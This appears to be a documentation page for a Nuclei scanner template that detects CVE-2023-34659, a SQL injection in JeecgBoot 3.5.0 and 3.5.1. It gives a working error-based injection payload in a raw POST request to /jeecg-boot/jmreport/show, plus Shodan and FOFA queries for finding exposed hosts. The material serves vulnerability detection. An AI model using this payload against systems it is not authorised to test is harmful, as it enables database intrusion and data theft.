JeecgBoot 3.5.0 - SQL Injection
ID: CVE-2023-34659
Severity: critical
Author: ritikchaddha
Tags: cve2023,cve,jeecg,sqli
Description
Section titled “Description”jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.
YAML Source
Section titled “YAML Source”id: CVE-2023-34659
info: name: JeecgBoot 3.5.0 - SQL Injection author: ritikchaddha severity: critical description: | jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade JeecgBoot to a patched version or apply the necessary security patches provided by the vendor. reference: - https://github.com/jeecgboot/jeecg-boot/issues/4976 - https://nvd.nist.gov/vuln/detail/CVE-2023-34659 - https://github.com/izj007/wechat classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34659 cwe-id: CWE-89 epss-score: 0.40226 epss-percentile: 0.97268 cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeecg product: jeecg_boot shodan-query: http.favicon.hash:1380908726 fofa-query: icon_hash=1380908726 tags: cve2023,cve,jeecg,sqli
http: - raw: - | POST /jeecg-boot/jmreport/show HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8
{"id":"961455b47c0b86dc961e90b5893bff05","apiUrl":"","params":"{"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '"}"}
matchers-condition: and matchers: - type: word part: body words: - "XPATH syntax error:" - "SQLException" condition: and
- type: word part: header words: - application/json
- type: status status: - 200# digest: 4a0a004730450220646ba4b331556bd48091dba80e9dab683748f6c76d97485d4df9d7a3ef9e0ebc02210087dd8940bac3ef73e6263be60ddbae953fb35e033284a837e2a49aab3dd63db5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-34659.yaml"